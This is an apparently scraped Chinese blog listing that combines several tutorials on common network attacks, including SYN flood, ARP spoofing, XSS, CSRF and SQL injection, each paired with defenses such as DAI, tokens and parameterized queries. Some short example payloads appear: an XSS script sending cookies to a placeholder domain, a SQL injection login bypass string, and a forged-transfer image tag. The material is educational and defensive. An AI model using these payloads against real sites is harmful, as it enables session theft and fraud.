精华内容
参与话题
问答
  • 常见的网络攻击类型

    万次阅读 2019-02-20 12:23:46
    常见的网络攻击类型 一、拒绝服务攻击 1.拒绝服务攻击 Dos(Denial of Service)是一种利用合理的服务请求占用过多的服务资源,从而使合法用户无法得到服务响应的网络攻击行为。 被DOS攻击时的现象大致有: 被...

    常见的网络攻击类型

    一、拒绝服务攻击

    1.拒绝服务攻击

    Dos(Denial of Service)是一种利用合理的服务请求占用过多的服务资源,从而使合法用户无法得到服务响应的网络攻击行为。

    被DOS攻击时的现象大致有:

    • 被攻击主机上有大量的TCP连接;
    • 被攻击的主机的系统资源被大量占用,造成系统停顿;
    • 网络中充斥着大量无用的数据包,源地址是假地址;
    • 高流量无用数据使得网络拥塞,受害主机无法正常与外界主机通讯;
    • 利用受害主机提供的服务或传输协议上的缺陷,反复告诉的发出特定的服务请求,使受害主机无法及时处理所有正常请求;
    • 严重时会造成系统死机。

    2.分布式拒绝服务攻击DDoS

    DDoS则是利用多台计算机,采用了分布式对单个或者多个目标同时发起DOS攻击。其特点是:目标“瘫痪敌人”,而不是传统的破坏和窃密;利用国际互联网遍布全球的计算机发起攻击,难于追踪。

    DDoS攻击由三部分组成:

    • 客户端程序(黑客主机)
    • 控制点(master)
    • 代理程序(Zombie),或者成为攻击点(daemon)

    DDoS攻击示意图:

                          

    3.常见的攻击手段

    • 死亡之ping(ping of death)
    • 泪滴(teardrop)
    • UDP洪水(UDP flood)
    • SYN洪水(SYN flood)
    • Land攻击
    • Smurf攻击

    4.SYN洪水攻击演示

    • 是利用TCP协议的缺陷,发送大量伪造的TCP协议请求,使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式;
    • SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way HandShake),而SYN Flood拒绝服务攻击就是通过三次握手而实现的。
    • 三次握手简介:
      • 1.首先,请求端(客户端)发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端2.使用的端口及TCP连接的初始序号;
      • 2.服务器在接收到客户端的SYN的报文之后,将返回一个SYN+ACK的报文,表示客户端的请求被接受,同时TCP序号被加一,ACK即确认(acknowledgement)。
      • 3.最后,客户端也返回一个确认报文ACK给服务器端,同样TCP序列号被加一,到此一个TCP连接完成。
      • 正常三次握手建立通讯的过程:

                     

    攻击者伪造源地址进行SYN请求

                          

    二、利用型攻击

    1.特洛伊木马(木马)

            概览:木马目前一般可以理解为“为进行非法目的的计算机病毒”,在电脑中潜伏,以达到黑客目的。木马一般伪装成一个实用工具或者一个游戏甚至一个位图文件,这会诱使用户将其安装在pc或者服务器上。一旦安装成功并取得管理员权限,攻击者就可以远程控制目标系统进行非法操作。

    Windows下:

            Netbus、subseven、BO2000、冰河、网络神偷

    UNIX下:

            Rhost++、Login后门、rootkit等

    2.缓冲区溢出

            概览:由于在很多服务器程序中大意的程序员使用strcpy()等不进行有效位检查的函数,最终可能导致恶意用户通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其他指令,以达到攻击的目的。

    三、.信息收集攻击

    1.扫描技术

    • 地址扫描:运用ping这样的程序探测目标地址,对此作出相应的表示其存在;
    • 端口扫描:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功建立了连接的主机所开的端口;
    • 反向映射:黑客向主机发送虚假消息,然后根据返回的消息特征判断出哪些主机是存在的;
    • 慢速扫描:由于一般扫描侦测器的实现是通过监视某个时间一台特定主机发起的连接数目来决定是否在被扫描,这样黑客可以使用扫描速度慢一些的扫描软件进行扫描。

    2.体系结构探测

           概览:攻击者使用具有已知相应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的相应进行检查。由于每种操作系统都有其独特的操作方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的相应与数据库中的已知相应进行对比,攻击者经常能够确定出目标主机所运行的操作系统。

    3.利用信息服务

    • DNS域转换:DNS协议不对转换或信息性的更新进行身份验证,这使得该协议被人以不同的方式加以利用。
    • Finger服务:使用finger命令来刺探一台finger服务器以获取关于该系统的用户信息。
    • LDAP:使用LDAP协议窥探网络内部的系统和它们的用户信息。

    四、假消息攻击

    1.DNS高速缓存污染

            概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得攻击者可以将不正确的信息参进来并把用户引向自己的主机。

    2.伪造电子邮件

           概览:由于SMTP服务并不对邮件发送者的身份进行鉴定,因此恶意的电子邮件往往正好是攻击者攻击用户的有效措施。常见的攻击方法有:发送垃圾信件、通过电子邮件执行恶意的代码、使用用户关系亲密者的电子邮件地址骗取用户的信任。

    五、口令攻击

          概述:几乎所有的多用户系统都要求用户不但提供一个名字或标识符(ID),而且要提供一个口令。口令用来鉴别一个注册系统的个人ID。在实际系统总,入侵者总是试图通过猜测或获取口令文件等方式来获取系统认证的口令,从而进入系统。入侵者登录后,便可以查找系统的其他安全漏洞,来得到进一步的特权。

         不安全的口令类型有:

    • 用户名或者用户名的变形;
    • 电话号码、执行号码等;
    • 一些常见的单词;
    • 生日;
    • 长度小于5的口令;
    • 空口令或者默认口令;
    • 上述词后加上数字;

     

    展开全文
  • 网络攻击的分类

    千次阅读 2018-11-17 16:59:38
    在高层次,攻击被分为两类: 主动攻击:包含攻击者访问其所需要信息的故意行为。比如远程登录到指定机器的25号端口找出公司运行的邮件服务器的信息等。攻击者是在主动地做一些不利于用户或用户公司的事情。 被动...

    在高层次,攻击被分为两类:

    1. 主动攻击:包含攻击者访问其所需要信息的故意行为。比如远程登录到指定机器的25号端口找出公司运行的邮件服务器的信息等。攻击者是在主动地做一些不利于用户或用户公司的事情。
    2. 被动攻击:主要是收集信息而不是进行访问,数据的合法用户一点也不会察觉到这种活动。被动攻击包括嗅探、欺骗等攻击方法。

    而就目前常见的攻击,大致可分为四大类:

    1.窃听:指攻击者通过非法手段对系统进行监视从而获得一些有关系统安全的关键信息。目前常用的窃听技术攻击方法有:

    • 键击记录
    • 网络监听
    • 非法访问数据
    • 获取密码文件

    2.欺骗:指攻击者通过冒充正常用户以获取对攻击目标访问权限或获取关键信息的攻击方法。属于此攻击的方法有:

    • 获取口令
    • 恶意代码
    • 网络欺骗

    3.拒绝服务:指终端完全拒绝对合法用户、网络、系统和其他资源的服务的攻击方法,其意图就是彻底破坏网络的正常运行。常见的攻击形式可分为:

    • 导致异常型
    • 资源耗尽型
    • 欺骗型

    4.数据驱动攻击:通过向某个程序发送数据,以产生非预期结果攻击,通常为攻击者给出访问目标系统的权限,大致可分为:

    • 缓冲区溢出
    • 格式化字符串攻击
    • 输入验证攻击
    • 同步漏洞攻击
    • 信任漏洞攻击
    展开全文
  • 常见的网络攻击技术

    千次阅读 2019-03-29 08:19:36
    一、跨站脚本攻击二、跨站请求伪 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,...

    一、跨站脚本攻击二、跨站请求伪

    一、跨站脚本攻击

    概念

    跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。

    攻击原理

    例如有一个论坛网站,攻击者可以在上面发布以下内容:

    <script>location.href="//domain.com/?c=" + document.cookie</script>

    之后该内容可能会被渲染成以下形式:

    <p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

    另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态,那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。

    危害

    窃取用户的 Cookie伪造虚假的输入表单骗取个人信息显示伪造的文章或者图片防范手段

    1. 设置 Cookie 为 HttpOnly

    设置了 HttpOnly 的 Cookie 可以防止 JavaScript 脚本调用,就无法通过 document.cookie 获取用户 Cookie 信息。

    2. 过滤特殊字符

    例如将 < 转义为 &lt;,将 > 转义为 &gt;,从而避免 HTML 和 Jascript 代码的运行。

    富文本编辑器允许用户输入 HTML 代码,就不能简单地将 < 等字符进行过滤了,极大地提高了 XSS 攻击的可能性。

    富文本编辑器通常采用 XSS filter 来防范 XSS 攻击,通过定义一些标签白名单或者黑名单,从而不允许有攻击性的 HTML 代码的输入。

    以下例子中,form 和 script 等标签都被转义,而 h 和 p 等标签将会保留。

    <h1 id="title">XSS Demo</h1><p>123</p><form> <input type="text" name="q" value="test"></form><pre>hello</pre><script type="text/javascript">alert(/xss/);</script><h1>XSS Demo</h1><p>123</p>&lt;form&gt; &lt;input type="text" name="q" value="test"&gt;&lt;/form&gt;<pre>hello</pre>&lt;script type="text/javascript"&gt;alert(/xss/);&lt;/script&gt;

    二、跨站请求伪造

    概念

    跨站请求伪造(Cross-site request forgery,CSRF),是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。

    XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户浏览器的信任。

    攻击原理

    假如一家银行用以执行转账操作的 URL 地址如下:

    withdraw?account=AccoutName&amount=1000&for=PayeeName。

    那么,一个恶意攻击者可以在另一个网站上放置如下代码:

    <img src="withdraw?account=Alice&amount=1000&for=Badman">。

    如果有账户名为 Alice 的用户访问了恶意站点,而她之前刚访问过银行不久,登录信息尚未过期,那么她就会损失 1000 美元。

    这种恶意的网址可以有很多种形式,藏身于网页中的许多地方。此外,攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛,博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话,用户即使访问熟悉的可信网站也有受攻击的危险。

    通过例子能够看出,攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权,也不能直接窃取用户的任何信息。他们能做到的,是欺骗用户浏览器,让其以用户的名义执行操作。

    防范手段

    1. 检查 Referer 首部字段

    Referer 首部字段位于 HTTP 报文中,用于标识请求来源的地址。检查这个首部字段并要求请求来源的地址在同一个域名下,可以极大的防止 CSRF 攻击。

    这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其 Referer 字段的可能。

    2. 添加校验 Token

    在访问敏感数据请求时,要求用户浏览器提供不保存在 Cookie 中,并且攻击者无法伪造的数据作为校验。例如服务器生成随机数并附加在表单中,并要求客户端传回这个随机数。

    3. 输入验证码

    因为 CSRF 攻击是在用户无意识的情况下发生的,所以要求用户输入验证码可以让用户知道自己正在做的操作。

    三、SQL 注入攻击

    概念

    服务器上的数据库运行非法的 SQL 语句,主要通过拼接来完成。

    攻击原理

    例如一个网站登录验证的 SQL 查询代码为:

    strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"

    如果填入以下内容:

    userName = "1' OR '1'='1";passWord = "1' OR '1'='1";

    那么 SQL 查询字符串为:

    strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"

    此时无需验证通过就能执行以下查询:

    strSQL = "SELECT * FROM users;"

    防范手段

    1. 使用参数化查询

    Java 中的 PreparedStatement 是预先编译的 SQL 语句,可以传入适当参数并且多次执行。由于没有拼接的过程,因此可以防止 SQL 注入的发生。

    PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");stmt.setString(1, userid);stmt.setString(2, password);ResultSet rs = stmt.executeQuery();

    2. 单引号转换

    将传入的参数中的单引号转换为连续两个单引号,PHP 中的 Magic quote 可以完成这个功能。

    四、拒绝服务攻击

    拒绝服务攻击(denial-of-service attack,DoS),亦称洪水攻击,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

    分布式拒绝服务攻击(distributed denial-of-service attack,DDoS),指攻击者使用两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。

    参考资料

    维基百科:跨站脚本维基百科:SQL 注入攻击维基百科:跨站点请求伪造维基百科:拒绝服务攻击

    造三、SQL 注入攻击四、拒绝服务攻击

    展开全文
  • 计算机网络中的各种攻击

    千次阅读 2018-09-20 16:16:52
    各种攻击先行了解 DOS(单挑):Deny of Service 拒绝服务攻击(带宽、CPU……),一台电脑攻击另一台电脑 DDOS(群殴):分布式拒绝服务攻击,多台电脑一起攻击一台电脑 ICMP泛洪攻击(死亡之PING、ICMP Flood)...

    各种攻击先行了解

    DOS(单挑):Deny of Service 拒绝服务攻击(带宽、CPU……),一台电脑攻击另一台电脑

    DDOS(群殴):分布式拒绝服务攻击,多台电脑一起攻击一台电脑

    ICMP泛洪攻击(死亡之PING、ICMP Flood):发送大量的ping包,使服务器处理不来

    TCP/UDP泛洪攻击(SYN Flood、SYN攻击):握手攻击、不回应

    HTTP泛洪攻击

    DNS放大攻击

    混杂流量攻击

     

     

    SYN 攻击

    什么是 SYN 攻击(SYN Flood)?

        在三次握手过程中,服务器发送 SYN-ACK 之后,收到客户端的 ACK 之前的 TCP 连接称为半连接(half-open connect)。此时服务器处于 SYN_RCVD 状态。当收到 ACK 后,服务器才能转入 ESTABLISHED 状态.

        SYN攻击指的是,攻击客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送SYN包,服务器回复确认包,并等待客户的确认。由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造的SYN包将长时间占用未连接队列,正常的SYN请求被丢弃,导致目标系统运行缓慢,严重则会引起网络堵塞甚至系统瘫痪。

        SYN 攻击是一种典型的 DoS/DDoS 攻击。

     

    如何检测 SYN 攻击?

        检测 SYN 攻击非常的方便,当你在服务器上看到大量的半连接状态时,特别是源IP地址是随机的,基本上可以断定这是一次SYN攻击。在Linux/Unix 上可以使用系统自带的 netstats 命令来检测 SYN 攻击。

     

    如何防御 SYN 攻击?

        SYN攻击不能完全被阻止,除非将TCP协议重新设计。我们所做的是尽可能的减轻SYN攻击的危害,常见的防御 SYN 攻击的方法有如下几种:

        缩短超时(SYN Timeout)时间

        增加最大半连接数

        过滤网关防护

        SYN cookies技术

     

    ARP攻击与防御

    ARP攻击(点击这里了解ARP

    PC1收到两个ARP回应包,内容分别如下:

        我是PC2,我的IP地址是IP2,我的MAC地址是MAC2;

        我是PC2,我的IP地址是IP2,我的MAC地址是MAC3;

    PC1一脸懵:咋回事?还有这操作?不管了,我选最新的!(后到优先)

        网络协议里各种表在处理缓存信息的方式:

        要么"先到先得",要么"后到优先"。上面提到的ARP和CAM表,就是遵循"后到优先"原则,而DHCP表,则遵循"先到先得"原则。

     

    那么问题来了,上面两个ARP回应包到底哪个先到哪个后到呢?

        作为初学者,可能还在纠结前后这种naive的问题;而作为hacker,只要持续不停发出ARP欺骗包,就一定能够覆盖掉正常的ARP回应包。稳健的ARP嗅探/渗透工具,能在短时间内高并发做网络扫描(例如1秒钟成千上百的数据包),能够持续对外发送欺骗包。

        就这样,PC1本来要发给PC2的数据包,落到了PC3(Hacker)手里,这就完成了一次完整的ARP攻击。反过来,如果PC2要将数据包发送给PC1,PC3仍然可以以同样的ARP欺骗实现攻击,这就有了下面这张图(PC3既欺骗了PC1,也欺骗了PC2)。

     

     

        此时,PC1和PC2的通信数据流被PC3拦截,形成了典型的"中间人攻击"。那么,一旦被攻击并拦截,攻击者能做什么,普通用户又会遭受什么损失?这里给大家举几个常见的例子=>

            ①攻击者既然操控了数据流,那么直接断开通信是轻而易举的,即"断网攻击",例如,PC1发给PC2的数据在PC3这里可以直接丢弃,而如果这里的PC2是一台出口路由器(无线路由器),那就意味着PC1直接无法连上互联网。

            ②"断网攻击"显然容易被发现,而且比较"残忍",所以就有了更加常见的应用-"限速"。例如,在宿舍上网突然很慢,在网吧上网突然打不开网页,如果这个网络没有安全防御,那么很有可能有"内鬼"。

            ③其实无论是"断网攻击"还是"限速",整体还是比较"善良",因为这里流量里面的核心数据还没有被"提取"出来。如果攻击者是一名真正的黑客,他的目的一定不会这么无聊,因为内网流量对于黑客是没有太大价值的,而只有"用户隐私",例如常见网站的登录账号密码,这些才是最有价值的。

     

    问:遭受ARP攻击之后,哪些账号可能被窃取?

    答:任何基于明文传输的应用,都可以被窃取。例如,如果一个网站不是HTTPS协议,而是基于HTTP明文传输,那么当你登录这个网站时,你的密码就会被窃取。除了http(web应用),常见的还有telnet、ftp、pop3/smtp/imap(邮箱)等应用,都很容易泄露密码。

     

    ARP攻击总结

        ①ARP缓存表基于"后到优先"原则,IP与MAC的映射信息能被覆盖;

        ②ARP攻击基于伪造的ARP回应包,黑客通过构造"错位"的IP和MAC映射,覆盖主机的ARP表(也被称为"ARP毒化"),最终截取用户的数据流;

    • 一旦遭受ARP攻击,账号密码都可能被窃取(如果通信协议不是加密的);
    • 通过Wireshark数据包分析,我们掌握了真实网络中ARP底层攻击原理及数据包组成。

     

    ARP防御原理与解决方案

        通过之前的文章,我们已经了解了ARP攻击的危害,黑客采用ARP软件进行扫描并发送欺骗应答,同处一个局域网的普通用户就可能遭受断网攻击、流量被限、账号被窃的危险。由于攻击门槛非常低,普通人只要拿到攻击软件就可以扰乱网络秩序,导致现在的公共网络、家庭网络、校园网、企业内网等变得脆弱无比。

     

    所以,如何进行有效的ARP防御?作为普通用户怎么防御?作为网络/安全管理员又怎么防御?

    有哪些ARP防御软件?如果被ARP攻击了,如何揪出"内鬼"并"优雅的还手"?

    有两种解决方案:

    1. 保证电脑不接收欺骗包
    2. 保证电脑收到欺骗包之后不相信

    简单来说,ARP防御可以在网络设备上实现,也可以在用户端实现,更可以在网络设备和用户端同时实现。

     

    1、在网络设备上实现(交换机的ARP防御):

        局域网安全里比较常用的防御技术,这种防御技术被称为DAI(Dynamic ARP Inspection)- 动态ARP检测,原理可以用两句话简单概括:

            ①交换机记录每个接口对应的IP地址和MAC,即port<->mac<->ip,生成DAI检测表;

            ②交换机检测每个接口发送过来的ARP回应包,根据DAI表判断是否违规,若违规则丢弃此数据包并对接口进行惩罚。

        我们知道,PC3是在交换机的Port3、MAC地址是MAC3,IP地址是IP3,所以本地DAI表项内容是<port3-mac3-ip3>。当交换机从接口Port3收到ARP回应包,内容却是IP2和MAC3映射,即<port3-mac3-ip2>,经判断,这个包就是虚假的欺骗包,交换机马上丢弃这个包,并且可以对接口做惩罚(不同设备的惩罚方式有所不同,可以直接将接口"软关闭",直接将攻击者断网;也可以"静默处理",仅丢弃欺骗包,其他通信正常)

        上面这个动态ARP监测技术,可以说是目前防御ARP攻击最有效的方法之一。但是,作为初学者,大家可能还会有疑问:

            ①一般的交换机或网络设备能部署动态ARP监测技术吗?

            ②连接用户的交换机,怎么能识别IP地址信息呢?

            ③上面这张DAI表是如何生成的?是不是像CAM表一样能自动识别?

     

        这里要给大家说个稍微悲伤一点的事实,大部分能支持这种动态ARP监测技术的交换机或者无线路由器,都基本是企业级的产品。即便是企业级交换机,具备局域网安全防御功能的设备,价格都要高出不少,所以很多中小型企业网或校园网,基本都愿意买"阉割版"网络接入产品,因为"能通就行",至于安全性怎样,这是另外要考虑的问题。

     

        所以,简单的交换机不具备动态ARP监测技术,即便市面上有带安全防御的网络产品,企业、学校、医院等大量网络,仍然在早期采购的时候,用的是比较基础版本的交换机。当然,随着网络与安全市场的激烈竞争和网络安全意识的增强,以后会越来越好。

     

    另外,交换机能识别IP地址信息吗?

        从现在的网络技术来看,分层界限越来越模糊,融合式的网络设备才是主流,现在的接入交换机基本能被Telnet/SSH/Web管理,更专业的交换机同时支持动态ARP监测(dai)、IP源防护(ipsg)、DHCP侦听(dhcp snooping)、端口安全、AAA、802.1x等局域网安全技术,已经超越了原有二层交换机的定义。所以,交换机能读三层甚至七层的数据包已经不是什么新鲜事了,不要被"交换机就是二层设备"给束缚了,这只是纸面上的定义。

     

    最后一个问题,DAI检测表是如何生成的?

        在上面图解中,我们看到交换机查看的表已经不是原来的CAM表了,内容也不太一样,CAM表的内容主要是MAC和Port的映射,而DAI检测表则是Port、MAC、IP三个信息映射。目前这张表支持两种方式来生成:第一种方式就是手工静态绑定:即用户接入网络之后,管理员根据此用户电脑的MAC和IP地址,然后在接口上绑死,缺点就是用户数太多的话,手工绑定管不过来;第二种方式就是目前最主流的做法,即在交换机上开启DHCP侦听技术,当用户第一次通过DHCP获取到地址的时候,交换机就把用户电脑的IP、MAC、Port信息记录在DHCP侦听表,后面ARP检测直接调用这张DHCP侦听表即可。

     

    小结:以上便是在网络设备上部署的ARP防御技术,通过动态ARP监测技术(DAI),可以很好的解决ARP欺骗问题。技术虽好,但局域网内的交换机、无线路由器是否支持DAI,这个则取决于实际网络情况,尤其是十面埋伏的公共WiFi网络、脆弱无比的家庭网络、能通就行的校园网络......  我们都应该持怀疑态度,至少不能完全信任这些网络。

     

    既然这样的话,普通用户有没有"自救"的方法,能够抵挡ARP攻击呢?答案是肯定的=>

        对于普通用户,陌生网络不要随意接入,肯定是首选考虑的;当然,这里研究的是用户已经接入了网络,如何做安全防御的问题。从上图可以看到,用户(电脑或手机)最重要的便是通过安装ARP防火墙做安全防御,很多普通用户甚至“以电脑裸奔为豪,以骂安全厂商为荣”,这是对技术的严重藐视,对自己隐私的不负责任。普通小白一定要记住一句话:你没有被黑,只是你还没有到达被黑的价值。

     

    ARP防火墙在技术实现上,一般都有以下功能:

        ①绑定正确的的IP和MAC映射,收到攻击包时不被欺骗。

        ②能够根据网络数据包特征(参考上一篇讲解的ARP攻击数据包溯源分析),自动识别局域网存在的ARP扫描和欺骗行为,并做出攻击判断(哪个主机做了攻击,IP和MAC是多少)。

     

    那么,有哪些常见的ARP安全产品呢?

        自带ARP防御功能:腾讯电脑管家、360安全卫士……

        专业的ARP防火墙:彩影ARP、金山贝壳、360ARP防火墙……

     

        采用安全产品肯定是普通用户最省时省力的做法,而对于技术人/工程师而言,如果不屑于使用安全产品,并且希望解决ARP攻击行为,也可以通过"ARP双向绑定"的技术来实现。

    什么是"ARP双向绑定"呢?

        从上图可以看到,PC1和PC2通信双方都静态绑定对方的IP和MAC映射,即便收到ARP欺骗包,由于静态绑定的ARP映射条目优先级高于动态学习到的,所以可以保证不被欺骗。

        这种做法非常"绿色无污染",因为不需要额外的软件安装,但是缺点也非常明显,例如普通用户不知道如何在电脑上做ARP静态绑定,另外工作量也比较大,每个主机和网关设备都需要绑定整个局域网的ARP静态映射。以下面的家庭WiFi网络为例:

     

    Windows arp静态绑定方法=>

        ①进入命令行cmd界面;

        ② [arp -s ip地址 mac地址],例如:arp -s 192.168.1.1   00-11-22-a1-c6-09

    注:家用无线路由器若要进行ARP绑定,则需要通过web登录并进行图形操作

     

    小结:用户端的ARP防御方法,要么安装ARP防火墙,要么做ARP双向绑定。对于绝大部分用户来讲,虽然安装防火墙不是保证百分百安全了,但是能够解决很大一部分的隐患。

     

    ARP防御总结

        ①ARP攻击非常低门槛,但是造成的影响却很大,包括断网攻击、流量被限、账号被盗等;

        ②ARP防御可以在网络端(网络设备)上部署,也可以在用户端(电脑/手机)上部署;

        ③网络设备(例如交换机)部署ARP防御,通常需要用到DAI(动态ARP监测)技术,更加专业的局域网安全防御,还可能结合DHCP侦听、IP源防护、端口安全、AAA、802.1X等技术,这些专业的防御技术,是由网络运维和安全运维工程师来实施的。

        ④用户端(电脑/手机)实施ARP防御,最好的方法就是不要随意接入陌生网络,并且安装ARP防火墙。当然,技术宅的话,可以采用"ARP双向绑定"的方法,相对比较麻烦,但是也奏效。

        ⑤作为一名有素养的网络/安全工程师,应该不作恶。但是如果遭受攻击,应该揪出内鬼并"优雅的还手",做一个网络警察,还普通用户一个干净的网络环境。

     

    黑客攻防:前端与后台

    使用http时:

    1问题:前端传输明文密码给后台,后台利用加盐操作将密码hash后放到数据库,但是黑客可以直接获取到从浏览器传输到后端的明文密码

    解决方法:使用RSA非对称加密,前端使用对应于后端的public key进行加密,后端再用private key解密

     

    2问题:黑客使用中间人方法,对浏览器伪装成博客,对博客伪装成浏览器,用户使用黑客提供的public key加密,黑客拿到后使用它的private key解密,然后再将得到的明文密码使用博客的public key加密,后端系统用它的private key解密,这个过程后端全然不知密码已经泄露

    解决方法:可以采用数字证书或者https,不过经费较大。所以采用在前端hash密码后再传输给数据库的方法,这样,即使黑客拿到了数据也获取不到明文密码了

     

    3问题:黑客可以直接拿到前端hash过后的密码,所以可以直接将这个密码发送给后端进行登录(重放攻击)(黑客已经获取不到明文密码了,但是仍然可以伪造登录)

    解决方法:使用动态验证码的方式,在前端hash一次得到code1,再用后端提供的验证码作为盐再hash得到code2,(其中code1对黑客不可见),然后再把code2和验证码一起发给后端。后端检测验证码正确与否,然后再拿数据库中的密码code1(这个code1是前端hash过一次的密码,这个密码可以在用户注册的时候进行存储,而登录全部采用验证码加盐验证的方式),利用验证码进行hash后得到code3,然后验证code2与code3是否相等。此时黑客只能拿到这一次的code2和验证码,即使黑客存储了这个值,下一次这两个值已经失效了,黑客拿到的东西也失去了意义了。

     

    4问题:黑客无法重放攻击了,采用攻击数据库获取信息的方法

    解决方法:在后端对拿到的前端的hash过一次的密码进行再hash,这样数据库中存储的便是加密过两次的数据了,黑客也难以用字典进行破解。

     

    参考链接:https://mp.weixin.qq.com/s/9ZB923jDybc143UKl1BRmQ

     

    XSS跨站脚本攻击

    跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS

     

    跨站脚本攻击:指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

    它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,获取用户的一些信息。

     

    xss攻击可以分成两种类型:
    1.非持久型攻击
    2.持久型攻击

     

    非持久型xss攻击:顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户浏览器执行,从而达到攻击目的。

    持久型xss攻击:持久型xss,会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。

     

    xss攻击也可以分成三种类型:

    反射型:经过后端,不经过数据库
    存储型:经过后端,经过数据库
    DOM:不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。
     

    前端防御方法:

    1、将能被转换为html的输入内容,在写代码时改为innerText而不用innerHTML

    2、实在没有办法的情况下可用如下方法(js代码)将含有<>等符号转化为其他字符

    function safeStr(str){
    return str.replace(/</g,'&lt;').replace(/>/g,'&gt;').replace(/"/g, "&quot;").replace(/'/g, "&#039;");
    }

    3、使用正则表达式过滤
     

    参考链接:

    https://blog.csdn.net/u011781521/article/details/53894399

    CSRF(跨站点请求伪造)攻击与防御

    CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:
           攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。

     

     CSRF攻击原理及过程如下:

           1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A;

           2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A;

           3. 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B;

           4. 网站B接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A;
           5. 浏览器在接收到这些攻击性代码后,根据网站B的请求,在用户不知情的情况下携带Cookie信息,向网站A发出请求。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求,导致来自网站B的恶意代码被执行。 

     

     CSRF漏洞检测:
           检测CSRF漏洞是一项比较繁琐的工作,最简单的方法就是抓取一个正常请求的数据包,去掉Referer字段后再重新提交,如果该提交还有效,那么基本上可以确定存在CSRF漏洞。

           随着对CSRF漏洞研究的不断深入,不断涌现出一些专门针对CSRF漏洞进行检测的工具,如CSRFTester,CSRF Request Builder等。

           以CSRFTester工具为例,CSRF漏洞检测工具的测试原理如下:使用CSRFTester进行测试时,首先需要抓取我们在浏览器中访问过的所有链接以及所有的表单等信息,然后通过在CSRFTester中修改相应的表单等信息,重新提交,这相当于一次伪造客户端请求。如果修改后的测试请求成功被网站服务器接受,则说明存在CSRF漏洞,当然此款工具也可以被用来进行CSRF攻击。

     

    防御CSRF攻击:

           目前防御 CSRF 攻击主要有三种策略:验证 HTTP Referer 字段;在请求地址中添加 token 并验证;在 HTTP 头中自定义属性并验证。

      (1)验证 HTTP Referer 字段

            根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址。在通常情况下,访问一个安全受限页面的请求来自于同一个网站,比如需要访问 http://bank.example/withdraw?account=bob&amount=1000000&for=Mallory,用户必须先登陆 bank.example,然后通过点击页面上的按钮来触发转账事件。这时,该转帐请求的 Referer 值就会是转账按钮所在的页面的 URL,通常是以 bank.example 域名开头的地址。而如果黑客要对银行网站实施 CSRF 攻击,他只能在他自己的网站构造请求,当用户通过黑客的网站发送请求到银行时,该请求的 Referer 是指向黑客自己的网站。因此,要防御 CSRF 攻击,银行网站只需要对于每一个转账请求验证其 Referer 值,如果是以 bank.example 开头的域名,则说明该请求是来自银行网站自己的请求,是合法的。如果 Referer 是其他网站的话,则有可能是黑客的 CSRF 攻击,拒绝该请求。

